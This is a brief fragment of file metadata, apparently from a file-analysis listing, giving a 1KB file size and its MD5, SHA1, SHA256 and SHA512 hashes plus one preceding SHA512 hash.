SHA512faf5fa55949ebcd8a8c69b674c2cf672409d67ceba6cd752ff4fd7afacd7ad0fb353e1b4117b336171fbff8e3bc037177c272524ce6c7a3c80651dd3e0fdb8d7
-
Filesize
1KB
MD5afc7f5d4772ea80e9d493eacb8938d0c
SHA1483f555fea0441c52264793e1070521495a5ec72
SHA2567ce920c7e5d86f06ab88fc977bb45551437c316ee73f2d2b8c6f266b2a20d258
SHA512f98c3c3064b1e1c7d6481258ffae70a10fb598025f3b5af298e812ced2996c221d31e917a1a3ece8a47b30c5a749019631d6fbb54e2bbfa65aacc0b7ee8250d2